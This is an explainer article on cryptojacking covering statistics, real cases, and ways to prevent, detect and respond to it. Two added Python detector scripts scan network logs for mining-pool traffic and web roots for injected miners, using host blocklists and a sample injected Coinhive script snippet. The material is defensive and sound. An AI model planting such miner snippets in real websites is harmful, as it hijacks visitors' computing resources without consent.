Cryptojacking, also called mining hijacking, is the unauthorized use of someone else's computer to mine cryptocurrency. Attackers typically get mining code onto a machine in one of two ways: by tricking the victim into clicking a malicious link in an email that loads the miner onto the computer, or by planting JavaScript in a website or online ad that executes automatically once it loads in the victim's browser. Either way, the mining code runs in the background while the unsuspecting victim uses the computer normally. The only sign they may notice is slower performance or lag.

Why do cryptojacking incidents occur so frequently?

No one knows how much cryptocurrency attackers have mined through cryptojacking, but there is no doubt the practice is growing, and browser-based cryptojacking is growing fastest. In November 2017, Adguard reported a 31% increase in in-browser cryptojacking; its research found 33,000 websites running cryptojacking scripts, with an estimated 1 billion visits to those sites per month. In February 2018, Bad Packets Report found 34,474 sites running Coinhive, the most popular JavaScript miner, which is also used for legitimate mining.

"Cryptocurrency mining is in its infancy and there is a lot of room for development and evolution," said Marc Laliberte, a threat intelligence analyst at cybersecurity vendor WatchGuard Technologies. He noted that Coinhive was easy to deploy and generated $300,000 in its first month. "From there, Coinhive grew really fast. It was really easy to make money this way."

In January, researchers discovered the Smominru cryptomining botnet, which had infected more than 500,000 machines, mostly in Russia, India, and Taiwan. The botnet targets Windows servers to mine Monero; security firm Proofpoint estimated that it had generated $3.6 million by the end of January.

Cryptojacking does not even require significant technical skill. According to Digital Shadows' report "The New Gold Rush: Cryptocurrency Emerges as a New Frontier for Fraud," cryptojacking kits are sold on the dark web for as little as $30.

One reason cryptojacking is gaining popularity with attackers is that it offers more money for less risk. "For hackers, cryptojacking is a cheaper and more profitable alternative to ransomware," said Alex Vaystikh, CTO and co-founder of SecBI. With ransomware, an attacker might infect 100 computers and get only three victims to pay; with cryptojacking, all 100 infected machines mine for the attacker. He explained that while the money from a single cryptojacking or ransomware victim may be comparable, mining keeps generating value over time.

The risk of being discovered and identified is also much lower than with ransomware. Mining code runs silently and can go unnoticed for a long time; even when it is found, it is hard to trace to its source. Because nothing is stolen or encrypted, the victim has little incentive to pursue it. Attackers also favor privacy coins such as Monero and Zcash over Bitcoin because activity in those currencies is harder to track back to them.

How does cryptojacking happen?

There are two main ways an attacker gets a victim's computer to mine quietly. The first is to trick the victim into loading mining code onto the computer, using phishing-style tactics: the victim receives a legitimate-looking email that entices them to click a link, and the link runs code that installs the mining script on the machine. The script then runs in the background while the victim works.

The second is to inject a script into a website or into an advertisement that is served to many sites. Once the victim visits the infected site or the malicious ad appears in the browser, the script executes automatically; no code is stored on the victim's computer. With either method, the code uses the victim's machine to do the mining work and sends the results to a server the attacker controls.

Attackers often combine both methods to maximize returns. "Attackers use malware techniques as a fallback to deliver more reliable and persistent malware to the victim's computer," Vaystikh said. For example, of 100 devices mining for an attacker, 10% might generate revenue from code installed on the device and 90% through the web browser.

Unlike most other malware, cryptojacking scripts do no damage to the computer or to the victim's data; what they steal is CPU time. For an individual user, slower performance may be only an annoyance. For a business with many hijacked systems, it means real cost: the help desk and IT department spend time tracking down performance problems and replacing components or systems in an effort to fix them.

Real-world cryptojacking cases

Cryptojackers are resourceful and have devised many schemes to use other people's computers to mine. Most are not new; they are delivered in ways borrowed from other malware such as ransomware or adware. Here are some real examples.

Rogue employee hijacks company systems: At this year's EmTech Digital conference, Darktrace told the story of a European bank whose servers were experiencing unusual traffic and running slowly overnight, yet the bank's diagnostic tools found nothing out of the ordinary. Darktrace discovered that new servers had been coming online during that period, servers the bank said it did not have. A physical inspection of the data center finally revealed that a rogue employee had built a cryptomining rig under the floor.

Spreading mining software via GitHub: In March, Avast Software reported that cryptojackers were using GitHub to host malicious cryptominers. They forked legitimate projects and hid the malware in the forked project's directory structure, then lured users into downloading it with phishing-style baits such as bogus Flash Player update prompts or sites disguised as adult games.

Exploiting an rTorrent misconfiguration: Cryptojackers discovered an rTorrent misconfiguration that leaves some rTorrent clients reachable over XML-RPC without authentication. They scanned the internet for exposed clients and deployed Monero miners on them. F5 Networks reported the issue in February and advised rTorrent users to make sure their clients do not accept external connections.

Facexworm, a malicious Chrome extension: Kaspersky Lab first discovered this malware in 2017 as a Google Chrome extension that used Facebook Messenger to infect users' computers. Initially, Facexworm delivered adware. Earlier this year, Trend Micro found several Facexworm variants that target cryptocurrency exchanges and can deliver cryptomining code. It still uses hijacked Facebook accounts to spread malicious links, but it can also steal web accounts and credentials, which lets it inject cryptojacking code into those web pages.

WinstarNssmMiner, the miner that fights removal: In May, 360 Total Security discovered WinstarNssmMiner, a fast-spreading cryptojacker. Its distinguishing trait is that removing it crashes the victim's computer. WinstarNssmMiner first launches an svchost.exe process and injects code into it, then sets the process's CriticalProcess attribute. Because Windows treats it as a critical process, forcibly terminating it triggers a blue screen, so a responder who simply kills the process will crash the machine.

How to prevent cryptojacking?

Following these steps will minimize the risk of your organization being hijacked for mining:
Include cryptojacking in your security awareness training. Laliberte believes training will help, since phishing will continue to be the main way attackers deliver all kinds of malware. For cryptojacking that runs automatically when users visit legitimate websites, however, Vaystikh said training is of little use, because you cannot tell users which websites not to visit.
Install an ad-blocking or anti-cryptomining browser extension. Because cryptojacking scripts are often delivered through online ads, an ad blocker can be an effective way to stop them. Some ad blockers, such as Adblock Plus, can detect cryptomining scripts. Laliberte recommends extensions such as No Coin and MinerBlock, which are designed to detect and block cryptomining scripts.
Use endpoint protection that can detect known miners. Many endpoint protection and antivirus vendors have added cryptominer detection. "Antivirus is one of the ways to prevent cryptojacking on the endpoint. If the program is known, it is likely to be detected," said Travis Farral, director of security strategy at Anomali. He added the caveat that cryptominer authors constantly change their techniques to evade endpoint detection.
Keep your web filtering tools up to date. If you identify a website that is delivering a mining script, make sure your users are blocked from accessing it again.
Maintain browser extensions. Some attackers use malicious browser extensions, or poison legitimate ones, to execute cryptomining scripts.
Use a mobile device management (MDM) solution to better control what is on users' devices. Bring-your-own-device (BYOD) policies make it harder to prevent illicit cryptomining. Laliberte believes MDM can go a long way toward keeping BYOD devices safe: MDM solutions help an organization manage the applications and extensions on user devices. They tend to be aimed at large enterprises and are often unaffordable for small businesses. Laliberte pointed out, however, that mobile devices are not as much at risk as desktops and servers, because their lower processing power makes them less profitable for attackers.

How to detect cryptojacking?

As with ransomware, you may be hit by cryptojacking despite your best efforts to prevent it. Detecting it can be difficult for an organization, especially when only a few systems are compromised. Here are some effective methods:
Train your help desk to look for the signs. Sometimes the first indication of cryptojacking is a help desk complaint from a user about slow computer performance, SecBI's Vaystikh said; companies should take such complaints seriously and investigate. Other signs the help desk should watch for are overheating systems, which can lead to CPU or cooling-fan failure. Laliberte noted that the sustained high CPU load causes heat damage and can shorten the life of the device, which is especially true for mobile devices such as tablets and smartphones.
Deploy a network monitoring solution. Vaystikh believes cryptojacking is easier to detect on a corporate network than on a home network, because most consumer endpoint products cannot detect it. Cryptojacking is easy to spot with network monitoring, and most enterprises already have network monitoring tools. However, even with the tools and the data, few companies have the capability to analyze that information for accurate detection; SecBI, for example, has developed an AI-based solution that analyzes network data to detect cryptojacking and other specific threats. Laliberte agrees that network monitoring is the best bet for detecting cryptojacking: a network perimeter monitoring solution that reviews all traffic has a better chance of detecting mining, and many such solutions drill down to individual users to identify which devices are affected. Farral said that if enterprise servers have good egress filtering that watches outbound connection requests, malicious miners can be detected well. He warned, however, that miner authors can rewrite their malware to evade that detection.
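Farral's point about watching outbound connection requests can be made concrete. The Python script below is an added example, not code from the article or from any of the vendors quoted in it. It scores connection-log records (a constructed, simplified JSON-per-line format with one record per connection and a payload snippet) for the Stratum JSON-RPC exchange that Monero miners such as XMRig use to log in to a pool and submit shares. The pool port list, the scoring weights and the alert threshold are assumptions to tune for your own network; the wallet address in the sample is structurally valid but fabricated.

```python
"""Added example: score connection-log records for Stratum mining-pool traffic."""
import json
import re
from dataclasses import dataclass, field

# Ports widely used by Monero pools (assumption: a starting list, tune it for your environment).
# A port hit on its own never reaches the alert threshold; it only adds weight.
POOL_PORTS = {3333, 3334, 4444, 5555, 7777, 8080, 9999, 14433, 14444}
# Stratum JSON-RPC methods; XMRig-style "login" carries the wallet in params.login and the
# miner name in params.agent.
STRATUM_METHODS = {"login", "job", "submit", "keepalived", "mining.subscribe", "mining.authorize"}
# Monero primary addresses start with '4', subaddresses with '8'; both are 95 base58 characters.
XMR_ADDRESS = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
MINER_AGENTS = ("xmrig", "xmr-stak", "cpuminer", "minerd")


@dataclass
class Finding:
    src_ip: str
    dst_ip: str
    dst_port: int
    score: int = 0
    reasons: list = field(default_factory=list)


def score_record(rec):
    """Score one connection record; higher means more miner-like."""
    f = Finding(rec["src_ip"], rec["dst_ip"], int(rec["dst_port"]))
    if f.dst_port in POOL_PORTS:
        f.score += 1
        f.reasons.append(f"port {f.dst_port} is common for mining pools")
    try:
        msg = json.loads(rec.get("payload", ""))
    except (ValueError, TypeError):
        msg = None  # plain HTTP, TLS or empty payloads are not JSON-RPC
    if not isinstance(msg, dict):
        return f
    method = msg.get("method")
    if method in STRATUM_METHODS:
        f.score += 2
        f.reasons.append(f"Stratum JSON-RPC method '{method}'")
    params = msg.get("params")
    if isinstance(params, dict):
        login = str(params.get("login", ""))
        # pools accept "<wallet>.<worker>" or "<wallet>+<difficulty>"; check only the wallet part
        if XMR_ADDRESS.match(re.split(r"[.+]", login, maxsplit=1)[0]):
            f.score += 3
            f.reasons.append("login field is a Monero wallet address")
        agent = str(params.get("agent", "")).lower()
        if agent.startswith(MINER_AGENTS):
            f.score += 3
            f.reasons.append(f"miner user agent '{params['agent']}'")
    return f


def detect(lines, threshold=3):
    """Return findings at or above threshold; one JSON record per line, blank lines skipped."""
    findings = []
    for line in lines:
        if line.strip():
            f = score_record(json.loads(line))
            if f.score >= threshold:
                findings.append(f)
    return findings


FAKE_WALLET = "4" + "A" * 94  # structurally valid, not a real wallet (constructed)


def constructed_log():
    """Four constructed records: two ordinary HTTP requests, then a miner login and a share submit."""
    login = {"id": 1, "jsonrpc": "2.0", "method": "login",
             "params": {"login": FAKE_WALLET, "pass": "x", "agent": "XMRig/6.16.4"}}
    submit = {"id": 2, "jsonrpc": "2.0", "method": "submit",
              "params": {"id": "1", "job_id": "abc", "nonce": "deadbeef", "result": "00" * 32}}
    records = [
        {"src_ip": "10.0.0.12", "dst_ip": "203.0.113.7", "dst_port": 443, "payload": ""},
        {"src_ip": "10.0.0.12", "dst_ip": "203.0.113.9", "dst_port": 8080, "payload": "GET /index.html HTTP/1.1"},
        {"src_ip": "10.0.0.31", "dst_ip": "198.51.100.4", "dst_port": 14444, "payload": json.dumps(login)},
        {"src_ip": "10.0.0.31", "dst_ip": "198.51.100.4", "dst_port": 14444, "payload": json.dumps(submit)},
    ]
    return [json.dumps(r) for r in records]


if __name__ == "__main__":
    for f in detect(constructed_log()):
        print(f"{f.src_ip} -> {f.dst_ip}:{f.dst_port} score={f.score}: {'; '.join(f.reasons)}")
```

The port-only record on 8080 scores 1 and is not reported, which keeps ordinary proxy traffic from paging anyone; the login record scores 9 and the share submit on the same flow scores 3. Farral's caveat applies directly: a miner moved to a non-standard port and wrapped in TLS leaves only the destination and the connection pattern to go on, so treat this as one signal to correlate with help desk reports and endpoint telemetry, not a verdict.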
Monitor your own websites for cryptomining code. Farral warned that cryptojackers are finding ways to place JavaScript on web servers. The server itself is not the target of the attack; anyone who visits the site risks infection. He recommends regularly monitoring web servers for file changes or for changes to the pages themselves.
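The in-browser method described earlier (a script tag injected into a page, which loads the miner and starts it) is exactly what Farral recommends watching for on your own web servers. The Python script below is an added example, not code from the article or from No Coin or MinerBlock. It takes a SHA-256 baseline of a web root, reports files added, removed or modified since that baseline, and scans HTML and JavaScript for the documented Coinhive form (a loader from coinhive.com followed by new CoinHive.Anonymous(...).start()) plus a few generic indicators. The blocklisted hosts other than coinhive.com and the keyword patterns are assumptions standing in for a maintained list; the demo web root, the site key placeholder and the WebSocket URL are constructed.

```python
"""Added example: baseline a web root and scan pages for injected in-browser miner code."""
import hashlib
import re
import tempfile
from pathlib import Path

# Hosts that serve in-browser miners. coinhive.com is the documented Coinhive loader host;
# the others are an assumption standing in for a maintained blocklist (No Coin / MinerBlock ship one).
MINER_HOSTS = {"coinhive.com", "coin-hive.com", "authedmine.com", "crypto-loot.com", "jsecoin.com"}
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']([^\"']+)[\"']", re.I)
# Content indicators: the Coinhive constructor, Coinhive API / CryptoNight names, and a WebSocket
# URL (miners stream pool jobs over wss; benign pages use them too, so that one is a lead, not a verdict).
MINER_PATTERNS = [
    (re.compile(r"\bCoinHive\.(Anonymous|User|Token)\s*\(", re.I), "Coinhive miner constructor"),
    (re.compile(r"\b(cryptonight|getHashesPerSecond|getTotalHashes)\b", re.I), "mining API/algorithm name"),
    (re.compile(r"wss://[^\"'\s]+", re.I), "WebSocket endpoint"),
]
TEXT_SUFFIXES = {".html", ".htm", ".js", ".php"}


def script_host(src):
    """Host part of a script src; '//host/x.js' and 'https://host/x.js' count, '/local.js' does not."""
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", src.strip())
    return m.group(1).lower() if m else ""


def scan_content(text):
    """Return the list of indicator labels found in one page or script."""
    reasons = []
    for src in SCRIPT_SRC.findall(text):
        host = script_host(src)
        if any(host == h or host.endswith("." + h) for h in MINER_HOSTS):
            reasons.append(f"script loaded from blocklisted host {host}")
    for pattern, label in MINER_PATTERNS:
        if pattern.search(text):
            reasons.append(label)
    return reasons


def build_baseline(root):
    """Map relative path -> SHA-256 for every file under root."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def changed_files(root, baseline):
    """Compare the current web root with a stored baseline."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in current.keys() & baseline.keys() if current[k] != baseline[k]),
    }


def scan_webroot(root, baseline=None):
    """Scan text files for miner indicators and, if a baseline is given, report file changes."""
    root = Path(root)
    report = {"suspicious": {}, "changes": None}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in TEXT_SUFFIXES:
            reasons = scan_content(p.read_text(errors="replace"))
            if reasons:
                report["suspicious"][str(p.relative_to(root))] = reasons
    if baseline is not None:
        report["changes"] = changed_files(root, baseline)
    return report


def demo():
    """Constructed web root: take a clean baseline, then simulate a Coinhive injection."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<html><body><h1>Hello</h1><script src='/app.js'></script></body></html>")
        (root / "app.js").write_text("console.log('app loaded');")
        baseline = build_baseline(root)
        clean = scan_webroot(root, baseline)
        # Attacker edits index.html in place and drops a helper script (constructed, placeholder site key).
        (root / "index.html").write_text(
            "<html><body><h1>Hello</h1><script src='/app.js'></script>"
            "<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
            "<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start();</script>"
            "</body></html>")
        (root / "m.js").write_text("var ws = new WebSocket('wss://ws.example.invalid/proxy');")
        return clean, scan_webroot(root, baseline)


if __name__ == "__main__":
    before, after = demo()
    print("clean root:", before)
    print("after injection:", after)
```

Take the baseline from a known-good deployment (ideally the release artifact rather than the live server) and re-run changed_files on a schedule. A page that changes outside a deployment window is worth reading even when no indicator matches, because, as the article notes, miner authors keep changing their code, and the blocklist and patterns here only catch what is already known.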
Stay abreast of cryptojacking trends. The delivery methods and the mining code itself are constantly evolving. Farral said that understanding the software and the behaviors helps a company detect cryptojacking, and a savvy company follows the latest developments. If you understand the delivery mechanisms for these attacks, you know that a particular exploit kit is delivering mining code, so defending against that exploit kit also defends against this specific malware.

How to respond to a cryptojacking attack?
Kill and block website-delivered scripts. For in-browser JavaScript attacks, the response once cryptojacking is detected is simple: close the browser tab running the script. IT should note the URL that is the source of the script and update the company's web filters to block it. Consider deploying anti-cryptomining tools to help prevent future attacks.
Update and purge browser extensions. Laliberte said that if an extension has infected the browser, closing the tab will not help. Update all extensions and remove any that are no longer needed or that are infected.
Learn and adapt. Use the experience to better understand how the attacker compromised your systems. Update your user, help desk, and IT training so they can better identify cryptojacking attempts and respond appropriately.